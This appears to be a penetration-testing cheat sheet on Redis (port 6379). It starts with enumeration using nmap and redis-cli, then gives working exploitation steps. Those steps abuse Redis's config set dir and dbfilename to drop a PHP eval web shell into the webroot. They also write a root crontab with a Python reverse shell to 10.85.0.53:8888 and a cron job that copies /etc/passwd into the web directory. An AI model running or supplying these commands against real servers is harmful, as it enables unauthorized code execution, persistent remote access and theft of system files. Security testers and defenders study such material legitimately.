Redis – port 6379

Redis is an in-memory data structure store, used as a database, cache and message broker. It usually uses a plain-text based protocol, but can also implement SSL/TLS.

Hydra supports Redis.

Nmap scripts

ls -la /usr/share/nmap/scripts/redis*
IP=x.x.x.x
nmap --script redis-info -sV -p 6379 $IP

On the server

Instance version

redis-server --version

Redis Client

redis-cli
redis-cli -h <hostname>

This message means that you need valid credentials to access the Redis instance.

-NOAUTH Authentication required.

Commands within the Redis client

Look under the “Keyspace” section to find available databases.

info
client list
config get *

Assuming database ID is 1 (see Keyspace section of “info” command)

SELECT 1
[ ... Indicate the database ... ]
KEYS * 
[ ... Get Keys ... ]
GET <KEY>
[ ... Get Key ... ]

Webshell

You need the webroot path.

  • /usr/share/nginx/html
  • /var/www/html
redis-cli -h $IP
config set dir /var/www/html
config set dbfilename redis.php
set test "<?php phpinfo(); ?>"
save
redis-cli -h $IP
config set dir /var/www/html
config set dbfilename sh.php
set payload '<?php eval($_GET[0]);?>'
bgsave

Reverse shell crontab

Not working for now

For Ubuntu and Centos, path is /var/spool/cron/

echo -e "\n\n*/1 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.85.0.53\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n"|redis-cli -h 10.85.0.52 -x set 1
OK
root@Urahara:~# redis-cli -h 10.85.0.52 config set dir /var/spool/cron/crontabs/
OK
root@Urahara:~# redis-cli -h 10.85.0.52 config set dbfilename root
OK
root@Urahara:~# redis-cli -h 10.85.0.52 save
OK
KALI=x.x.x.x
IP=y.y.y.y
echo -e "\n\n* * * * * cp /etc/passwd /var/www/html/passwd\n\n"|redis-cli -h $IP -x set 1
OK
redis-cli -h $IP config set dir /var/spool/cron/crontabs/
OK
redis-cli -h $IP config set dbfilename root
OK
redis-cli -h $IP save
OK